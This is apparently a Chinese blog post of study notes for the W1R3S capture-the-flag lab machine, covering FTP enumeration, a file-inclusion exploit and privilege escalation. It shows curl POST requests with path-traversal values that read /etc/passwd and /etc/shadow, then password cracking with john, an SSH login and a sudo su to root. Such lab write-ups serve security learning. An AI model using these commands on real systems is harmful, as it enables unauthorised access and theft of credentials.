W1R3S靶机渗透

涉及

nmap

链接:
https://blog.csdn.net/2202_75361164/article/details/137844118

FTP

基础

  • 进入FTP 中,首先就要使用binary转换成二进制模式,防止文件下载出错。
  • FTP的命令和Linux比较像。如ls,cd之类的命令

命令使用

链接
ftp ip地址
下载文件
ls        //查看文件
cd 文件名  //进入文件
mget/get 文件如(*.txt) //下载文件
  1. mget 用于多个文件下载,get用于单个文件下载;

  2. 在开始进行上述下载操作时,先使用prompt命令取消交互, 使得可以没有交互的麻烦;

image.png
image.png

参考

https://cn-sec.com/archives/2111070.html
https://www.cnblogs.com/henry666/p/16921435.html

文章总结

  • 进入FTP 中,首先就要使用binary转换成二进制模式,防止文件下载出错。
  • 此处推荐一个处理文本倒置的在线网站:https://www.upsidedowntext.com/, 经过处理后得到的文本信

web渗透

  • 细节看文章

cms识别

[[cms识别]]

漏洞利用

[[漏洞利用]]

  • 使用searchsploit命令

文件包含漏洞读取任意文件

  • 直接引用文章
    第一次构造失败,多试几种组合

【红队靶机系列】W1R3S 1.0.1

选择这种构造出现了不同,说明有大概率存在文件包含,猜测不显示文件有可能为传输方式为post,url为get传输。

我们先用post传一下。看看显示如何。
使用curl命令提交Post请求: curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.47.154/administrator/alerts/alertConfigField.php, 成功得到目标主机的passwd文件内容


获取目标主机的shadow文件: curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.47.154/administrator/alerts/alertConfigField.php, 这里可以看到两处很明显的用户信息[[敏感文件]]

john爆破

[[john]]

  • 将得到的/etc/shadow的内容复制到user.hash文件
    image.png
  • 爆破出w1r3s密码为computer

ssh远程登录提权

[[ssh]],[[sudo提权]]

  • 直接引用文章
    使用ssh命令登录w1r3s用户: ssh w1r3s@192.168.47.154


查看当前用户的权限:sudo -l, 可以发现是全权限


既然是全权限, 可以直接执行sudo su获取root用户权限,随后获取root根目录下的flag.txt文件

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值